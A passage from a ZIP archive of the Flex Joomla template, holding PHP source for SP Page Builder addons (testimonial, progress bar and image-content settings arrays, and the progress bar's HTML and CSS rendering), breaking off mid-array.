				'review_size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_REVIEW_SIZE'),
					'min'=>10,
					'max'=>50,
					'responsive'=>true,
					'depends'=>array(array('review', '!=', '')),
				),

				'review_line_height'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_REVIEW_LINE_HEIGHT'),
					'min'=>10,
					'max'=>50,
					'responsive'=>true,
					'depends'=>array(array('review', '!=', '')),
				),

				'review_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_REVIEW_COLOR'),
					'depends'=>array(array('review', '!=', '')),
				),

				'name'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_NAME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_NAME_DESC'),
					'std'=>'John Doe'
				),

				'company'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_COMPANY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_COMPANY_DESC'),
					'std'=>  'CEO, Flex Corporation',
				),
				
				'show_avatar'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('FLEX_SHOW_AVATAR'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1,
				),
				
				
				'avatar'=>array(
					'type'=>'media',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_AVATAR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_AVATAR_DESC'),
					'depends'=>array(
						array('show_avatar', '=', 1)
					)
				),

				'avatar_width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_AVATAR_WIDTH'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_AVATAR_WIDTH_DESC'),
					'std'=>64,
					'min'=>16,
					'max'=>128,
					'depends'=>array(
						array('show_avatar', '=', 1)
					)
				),
				
				'link'=>array(
					'type'=>'text', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_URL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_URL_DESC'),
					'std' => '',
					'placeholder'=>'http://website.com',
				),
				
				'link_target'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
						'_blank'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
						),
					'depends'=>array(array('link', '!=', '')),
				),
					
				'show_footer_link'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('FLEX_SHOW_LINK'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>0,
					'depends'=>array(array('link', '!=', '')),
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT_DESC'),
					'values'=>array(
						'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'left',
				),
				
				// Rating
				'rating_separator'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_RATING_OPTIONS'),
				),
				'client_rating_enable'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_RATING_ENABLE'),
					'std'=>0
				),
				'client_rating'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_RATING'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_RATING_DESC'),
					'depends'=>array(
						array('client_rating_enable', '=', 1),
					),
					'max'=>5,
					'min'=>1,
					'std'=>5,
				),
				'client_rating_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_RATING_COLOR'),
					'depends'=>array(
						array('client_rating_enable', '=', 1),
					),
					'std'=>''
				),
				'client_unrated_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_UNRATED_COLOR'),
					'depends'=>array(
						array('client_rating_enable', '=', 1),
					),
					'std'=>''
				),
				'client_rating_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_RATING_FONTSIZE'),
					'depends'=>array(
						array('client_rating_enable', '=', 1),
					),
					'responsive'=>true,
					'std'=>array('md'=>14),
				),
				'client_rating_margin'=>array(
					'type'=>'margin',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_RATING_MARGIN'),
					'depends'=>array(
						array('client_rating_enable', '=', 1),
					),
					'responsive'=>true,
					'std'=>'20px 0px 10px 0px',
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),
			),
		),
	)
);
PK!�Aq���/flex/sppagebuilder/addons/progress_bar/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2019 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

class SppagebuilderAddonProgress_bar extends SppagebuilderAddons {

	public function render() {

		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';
		$class .= (isset($this->addon->settings->shape) && $this->addon->settings->shape) ? 'sppb-progress-' . $this->addon->settings->shape : '';
		$type = (isset($this->addon->settings->type) && $this->addon->settings->type) ? $this->addon->settings->type : 'sppb-progress-bar-default';
		$progress = (isset($this->addon->settings->progress) && $this->addon->settings->progress) ? $this->addon->settings->progress : '';
		$text = (isset($this->addon->settings->text) && $this->addon->settings->text) ? $this->addon->settings->text : '';
		$stripped = (isset($this->addon->settings->stripped) && $this->addon->settings->stripped) ? $this->addon->settings->stripped : '';
		$active = (isset($this->addon->settings->active) && $this->addon->settings->active) ? $this->addon->settings->active : '';
		
			
		//Output
		$output = '';
		
		if($type == 'flex') {
			$output .= '<div class="flex-text-wrapper"><div class="flex-text">'.  $text .'</div>';
			$output .= '<div class="flex-progress-text">'. (int) $progress .'%</div>';
			$output .= '</div>';
		} 
		
		$output .= '<div class="sppb-progress ' . $class . '">';
		$output .= '<div style="min-width:0;" class="sppb-progress-bar ' . $type . ' ' . $stripped . ' ' . $active . '" role="progressbar" aria-valuenow="' . (int) $progress . '" aria-valuemin="0" aria-valuemax="100" data-width="' . (int) $progress . '%">';
		
		if($type != 'flex') {
			$output .= ($text) ? $text : '';
		}
		
		$output .= '</div>';
		$output .= '</div>';

		return $output;
		
		
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$custom_height = (isset($this->addon->settings->custom_height) && $this->addon->settings->custom_height) ? $this->addon->settings->custom_height : 0;
		$type = (isset($this->addon->settings->type) && $this->addon->settings->type) ? $this->addon->settings->type : 'sppb-progress-bar-default';
		$bar_background = (isset($this->addon->settings->bar_background) && $this->addon->settings->bar_background) ? $this->addon->settings->bar_background : '';
		$custom_color = (isset($this->addon->settings->custom_color) && $this->addon->settings->custom_color) ? $this->addon->settings->custom_color : '';
		$text_color = (isset($this->addon->settings->text_color) && $this->addon->settings->text_color) ? $this->addon->settings->text_color : '';
		
		$animation_duration = (isset($this->addon->settings->animation_duration) && $this->addon->settings->animation_duration) ? $this->addon->settings->animation_duration : 0;
		$animation_delay = (isset($this->addon->settings->animation_delay) && $this->addon->settings->animation_delay) ? $this->addon->settings->animation_delay : 0;
		
		$animation_duration != '' ? $animation_duration : $animation_duration = '2';
		$animation_delay != '' ? $animation_delay = ' '.$animation_delay . 's' : $animation_delay = '';

		$css = '';
		if($custom_height) {
			$css .= $addon_id . ' .sppb-progress {height: '. $custom_height .'px;}';
			$css .= $addon_id . ' .sppb-progress-bar {line-height: '. $custom_height .'px;}';
		}
		
		if($animation_duration || $animation_delay) {
			$css .= $addon_id . ' .sppb-progress-bar{'
				. '-webkit-transition:' . $animation_duration . 's ease'.$animation_delay.';'
				. 'transition:' . $animation_duration . 's ease'.$animation_delay.';'
				. '}';
		}

		if($type == 'flex') {
			$css .= $addon_id . ' .flex-text-wrapper {color: '. $text_color .';}';		
		} else {
			$css .= $addon_id . ' .sppb-progress-bar {color: '. $text_color .';}';
		}
		
		if($bar_background) {
			$css .= $addon_id . ' .sppb-progress {background-color: '. $bar_background .';}';
		}

		if($custom_color) {
			$css .= $addon_id . ' .sppb-progress-bar {background-color: '. $custom_color .';}';
		}

		return $css;

	}

}
PK!%�+�XX0flex/sppagebuilder/addons/progress_bar/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

SpAddonsConfig::addonConfig(
	array(
		'type'=>'general',
		'addon_name'=>'sp_progress_bar',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_DESC'),
		'category'=>'Content',
		'attr'=>array(

			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),
				
				'type'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_TYPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_TYPE_DESC'),
					'values'=>array(
						'sppb-progress-bar-default'=>JText::_('Default'),
						'flex'=>JText::_('Flex'),
						'sppb-progress-bar-primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
						'sppb-progress-bar-success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
						'sppb-progress-bar-info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
						'sppb-progress-bar-warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
						'sppb-progress-bar-danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
						'custom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
						),
					'std'=>'sppb-progress-bar-default',
				),

				'progress'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_PROGRESS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_PROGRESS_DESC'),
					'std'=>60,
					'min'=>1,
					'max'=>100
				),
				
				'custom_height'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_HEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_HEIGHT_DESC'),
					'std'=>20,
					'min'=>1,
					'max'=>100
				),
			
				'bar_background'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_BACKGROUND_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_BACKGROUND_COLOR_DESC'),
					'std' => '#cccccc',
				),
				
				'custom_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_COLOR_DESC'),
					'std' => '#f14833',
				),

				'stripped'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_STRIPPED'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_STRIPPED_DESC'),
					'values'=>array(
						''=>JText::_('JNO'),
						'sppb-progress-bar-striped'=>JText::_('JYES'),
					),
				),
				
				'active'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_ACTIVE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_ACTIVE_DESC'),
					'values'=>array(
						''=>JText::_('JNO'),
						'active'=>JText::_('JYES'),
						),
				),

				'text'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_TEXT_DESC'),
					'std'=>'',
				),
				
				'text_color'=>array(
					'type'=>'color', 
					'title'=>JText::_('HELIX_TEXT_COLOR'),
					'desc'=>JText::_('HELIX_TEXT_COLOR_DESC'),
					'std'=>'',
					'depends'=>array(array('text', '!=', '')),
				),

				'animation_duration'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_ANIMATION_DURATION'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_ANIMATION_DURATION_DESC'),
					//'placeholder'=>2,
					'std'=>2,
					'min'=>1,
					'max'=>10
				),
					
				'animation_delay'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_ANIMATION_DELAY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_ANIMATION_DELAY_DESC'),
					//'placeholder'=>0,
					'std'=>0,
					'min'=>0,
					'max'=>10
					),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),
			),
		),
	)
);
PK!��U�9=9=1flex/sppagebuilder/addons/image_content/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('Restricted access');

require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
array(
	'type'=>'content',
	'addon_name'=>'sp_image_content',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_DESC'),
	'category'=>'Content',
	'attr'=>array(
		'general' => array(

			'admin_label'=>array(
				'type'=>'text',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
				'std'=> ''
			),

			'separator1'=>array(
				'type'=>'separator',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE')
			),

			'image'=>array(
				'type'=>'media',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE'),
				'std'=>array(
					'src'=>'https://sppagebuilder.com/addons/carousel/carousel-bg.jpg',
				)
			),

			'image_alignment'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_ALIGNMENT'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_ALIGNMENT_DESC'),
				'values'=>array(
					'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
					'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
				),
				'std'=>'left',
			),
			
			'image_background_size'=>array(
				'type'=>'select', 
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_BACKGROUND_SIZE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_BACKGROUND_SIZE_DESC'),
				'values'=>array(
					'cover'=>JText::_('HELIX_BG_COVER'),
					'contain'=>JText::_('HELIX_BG_CONTAIN'),
					'inherit'=>JText::_('HELIX_BG_INHERIT'),
					),
				'std'=>'contain',
			),

			'separator2'=>array(
				'type'=>'separator',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_CONTENT')
			),

			'title'=>array(
				'type'=>'text',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_TITLE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_TITLE_DESC'),
				'std'=>'Image Content Addon'
			),

			'heading_selector'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
				'values'=>array(
					'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
					'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
					'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
					'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
					'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
					'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
				),
				'std'=>'h3',
				'depends'=>array(array('title', '!=', '')),
			),

			'title_fontsize'=>array(
				'type'=>'slider',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
				'std'=>'',
				'depends'=>array(array('title', '!=', '')),
				'responsive' => true,
				'max'=> 400,
			),

			'title_lineheight'=>array(
				'type'=>'slider',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
				'std'=>'',
				'depends'=>array(array('title', '!=', '')),
				'responsive' => true,
				'max'=> 400,
			),

			'title_font_family'=>array(
				'type'=>'fonts',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
				'selector'=> array(
					'type'=>'font',
					'font'=>'{{ VALUE }}',
					'css'=>'.sppb-addon-title { font-family: "{{ VALUE }}"; }'
				),
				'depends'=>array(array('title', '!=', '')),
			),

			'title_font_style'=>array(
				'type'=>'fontstyle',
				'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
				'depends'=>array(array('title', '!=', '')),
			),

			'title_letterspace'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
				'values'=>array(
					'0'=> 'Default',
					'1px'=> '1px',
					'2px'=> '2px',
					'3px'=> '3px',
					'4px'=> '4px',
					'5px'=> '5px',
					'6px'=>	'6px',
					'7px'=>	'7px',
					'8px'=>	'8px',
					'9px'=>	'9px',
					'10px'=> '10px'
				),
				'std'=>'0',
				'depends'=>array(array('title', '!=', '')),
			),

			'title_text_color'=>array(
				'type'=>'color',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
				'depends'=>array(array('title', '!=', '')),
			),

			'title_margin_top'=>array(
				'type'=>'slider',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
				'placeholder'=>'10',
				'depends'=>array(array('title', '!=', '')),
				'max'=>400,
				'responsive' => true
			),

			'title_margin_bottom'=>array(
				'type'=>'slider',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
				'placeholder'=>'10',
				'depends'=>array(array('title', '!=', '')),
				'max'=>400,
				'responsive' => true
			),

			'text'=>array(
				'type'=>'editor',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_CONTENT'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_CONTENT_DESC'),
				'std'=> 'The recording starts with the patter of a summer squall. Later, a drifting tone like that of a not-quite-tuned-in radio station rises and for a while drowns out the patter. These are the sounds encountered by.<br /><br />NASA’s Cassini spacecraft as it dove through the gap between Saturn and its innermost ring on April 26, the first of 22 such encounters before it will plunge into Saturn’s atmosphere in September.'
			),

			//Button
			'button_text'=>array(
				'type'=>'text',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT_DESC'),
				'std'=>'Button Text',
			),

			'button_font_family'=>array(
				'type'=>'fonts',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_FAMILY'),
				'selector'=> array(
					'type'=>'font',
					'font'=>'{{ VALUE }}',
					'css'=>'.sppb-btn { font-family: "{{ VALUE }}"; }'
				),
				'depends'=> array(
					array('button_text', '!=', ''),
				)
			),

			'button_font_style'=>array(
				'type'=>'fontstyle',
				'title'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_STYLE'),
				'depends'=> array(
					array('button_text', '!=', ''),
				)
			),

			'button_letterspace'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_LETTER_SPACING'),
				'values'=>array(
					'0'=> 'Default',
					'1px'=> '1px',
					'2px'=> '2px',
					'3px'=> '3px',
					'4px'=> '4px',
					'5px'=> '5px',
					'6px'=>	'6px',
					'7px'=>	'7px',
					'8px'=>	'8px',
					'9px'=>	'9px',
					'10px'=> '10px'
				),
				'std'=>'0',
				'depends'=> array(
					array('button_text', '!=', ''),
				)
			),

			'button_url'=>array(
				'type'=>'media',
				'format'=>'attachment',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL_DESC'),
				'placeholder'=>'http://',
				'depends'=> array(
					array('button_text', '!=', ''),
				),
				'std' => '#',
				'hide_preview' => true,
			),

			'button_target'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB_DESC'),
				'values'=>array(
					''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
					'_blank'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
				),
				'depends'=> array(
					array('button_text', '!=', ''),
				)
			),

			'button_type'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE_DESC'),
				'values'=>array(
					'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
					'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
					'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
					'light'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LIGHT'),
					'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
					'secondary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SECONDARY'),
					'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
					'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
					'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
					'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
					'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
					'custom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
				),
				'std'=>'success',
				'depends'=> array(
					array('button_text', '!=', ''),
				)
			),

			'button_appearance'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_DESC'),
				'values'=>array(
					''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_FLAT'),
					'gradient'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_GRADIENT'),
					'outline'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_OUTLINE'),
					'3d'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_3D'),
				),
				'std'=>'',
				'depends'=> array(
					array('button_text', '!=', ''),
				)
			),

			'button_status'=>array(
				'type'=>'buttons',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ENABLE_BACKGROUND_OPTIONS'),
				'std'=>'normal',
				'values'=>array(
					array(
						'label' => 'Normal',
						'value' => 'normal'
					),
					array(
						'label' => 'Hover',
						'value' => 'hover'
					),
				),
				'tabs' => true,
				'depends'=>array(
					array('button_type', '=', 'custom'),
					array('button_text', '!=', ''),
				)
			),

			'button_background_color'=>array(
				'type'=>'color',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_DESC'),
				'std' => '#444444',
				'depends'=> array(
					array('button_appearance', '!=', 'gradient'),
					array('button_type', '=', 'custom'),
					array('button_status', '=', 'normal'),
					array('button_text', '!=', ''),
				)
			),

			'button_background_gradient'=>array(
				'type'=>'gradient',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
				'std'=> array(
					"color" => "#B4EC51",
					"color2" => "#429321",
					"deg" => "45",
					"type" => "linear"
				),
				'depends'=>array(
					array('button_appearance', '=', 'gradient'),
					array('button_type', '=', 'custom'),
					array('button_status', '=', 'normal'),
					array('button_text', '!=', ''),
				)
			),

			'button_color'=>array(
				'type'=>'color',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_DESC'),
				'std' => '#fff',
				'depends'=> array(
					array('button_type', '=', 'custom'),
					array('button_status', '=', 'normal'),
					array('button_text', '!=', ''),
				)
			),

			'button_background_color_hover'=>array(
				'type'=>'color',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER_DESC'),
				'std' => '#222',
				'depends'=> array(
					array('button_appearance', '!=', 'gradient'),
					array('button_type', '=', 'custom'),
					array('button_status', '=', 'hover'),
					array('button_text', '!=', ''),
				)
			),

			'button_background_gradient_hover'=>array(
				'type'=>'gradient',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
				'std'=> array(
					"color" => "#429321",
					"color2" => "#B4EC51",
					"deg" => "45",
					"type" => "linear"
				),
				'depends'=>array(
					array('button_appearance', '=', 'gradient'),
					array('button_type', '=', 'custom'),
					array('button_status', '=', 'hover'),
					array('button_text', '!=', ''),
				)
			),

			'button_color_hover'=>array(
				'type'=>'color',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER_DESC'),
				'std' => '#fff',
				'depends'=> array(
					array('button_type', '=', 'custom'),
					array('button_status', '=', 'hover'),
					array('button_text', '!=', ''),
				)
			),

			'button_size'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE'),
